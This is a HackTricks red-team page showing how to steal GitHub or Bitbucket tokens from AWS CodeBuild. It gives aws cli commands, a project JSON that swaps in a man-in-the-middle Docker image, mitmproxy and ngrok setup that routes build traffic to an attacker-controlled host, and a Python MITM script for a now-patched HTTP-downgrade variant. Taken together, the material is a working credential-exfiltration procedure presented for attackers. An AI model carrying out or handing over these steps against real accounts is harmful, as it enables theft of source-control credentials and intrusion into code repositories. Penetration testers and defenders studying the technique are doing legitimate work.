AWS Codebuild - Token Leakage

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Recover Github/Bitbucket Configured Tokens

First, check if there are any source credentials configured tha you could leak:

aws codebuild list-source-credentials

Via Docker Image

If you find that authentication to for example Github is set in the account, you can exfiltrate that access (GH token or OAuth token) by making Codebuild to use an specific docker image to run the build of the project.

For this purpose you could create a new Codebuild project or change the environment of an existing one to set the Docker image.

The Docker image you could use is https://github.com/carlospolop/docker-mitm. This is a very basic Docker image that will set the env variables https_proxy, http_proxy and SSL_CERT_FILE. This will allow you to intercept most of the traffic of the host indicated in https_proxy and http_proxy and trusting the SSL CERT indicated in SSL_CERT_FILE.

Create & Upload your own Docker MitM image
- Follow the instructions of the repo to set your proxy IP address and set your SSL cert and build the docker image.
  - DO NOT SET http_proxy to not intercept requests to the metadata endpoint.
- You could use ngrok like ngrok tcp 4444 lo set the proxy to your host
- Once you have the Docker image built, upload it to a public repo (Dockerhub, ECR...)
Set the environment
- Create a new Codebuild project or modify the environment of an existing one.
- Set the project to use the previously generated Docker image

Set the MitM proxy in your host

As indicated in the Github repo you could use something like:

mitmproxy --listen-port 4444  --allow-hosts "github.com"

The mitmproxy version used was 9.0.1, it was reported that with version 10 this might not work.

Run the build & capture the credentials

You can see the token in the Authorization header:

This could also be done from the aws cli with something like

# Create project using a Github connection
aws codebuild create-project --cli-input-json file:///tmp/buildspec.json

## With /tmp/buildspec.json
{
    "name": "my-demo-project",
    "source": {
        "type": "GITHUB",
        "location": "https://github.com/uname/repo",
        "buildspec": "buildspec.yml"
    },
    "artifacts": {
        "type": "NO_ARTIFACTS"
    },
    "environment": {
        "type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
        "image": "docker.io/carlospolop/docker-mitm:v12",
        "computeType": "BUILD_GENERAL1_SMALL",
        "imagePullCredentialsType": "CODEBUILD"
    }
}

## Json

# Start the build
aws codebuild start-build --project-name my-project2

Via HTTP protocol

This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)

An attacker with elevated permissions in over a CodeBuild could leak the Github/Bitbucket token configured or if permissions was configured via OAuth, the temporary OAuth token used to access the code.

An attacker could add the environment variables http_proxy and https_proxy to the CodeBuild project pointing to his machine (for example http://5.tcp.eu.ngrok.io:14972).

Then, change the URL of the github repo to use HTTP instead of HTTPS, for example: **http://**github.com/carlospolop-forks/TestActions
Then, run the basic example from https://github.com/synchronizing/mitm in the port pointed by the proxy variables (http_proxy and https_proxy)

from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
    host="127.0.0.1",
    port=4444,
    protocols=[protocol.HTTP], 
    middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
    certificate_authority = crypto.CertificateAuthority()
)
mitm.run()

Finally, click on Build the project, the credentials will be sent in clear text (base64) to the mitm port:

Now an attacker will be able to use the token from his machine, list all the privileges it has and (ab)use easier than using the CodeBuild service directly.

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - CodeBuild Post Exploitation NextAWS - Control Tower Post Exploitation

Last updated 2 months ago